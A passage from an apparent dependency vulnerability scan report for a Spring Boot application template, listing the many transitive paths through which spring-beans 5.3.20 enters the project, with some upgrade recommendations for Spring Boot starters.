  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.data:spring-data-jpa@2.7.2 org.springframework:spring-orm@7.0.0-M9 org.springframework:spring-jdbc@5.3.22 org.springframework:spring-tx@7.0.0-M9 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-actuator-autoconfigure@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.4.9.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.4.9.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-cache@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-cache@3.4.9.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-mail@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-mail@3.4.9.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.4.9.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-thymeleaf@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-thymeleaf@3.4.9.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.4.9.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-actuator-autoconfigure@2.7.3 org.springframework.boot:spring-boot-actuator@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.4.9.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-aop@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.4.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-jdbc@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.4.9.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-json@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.4.9.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
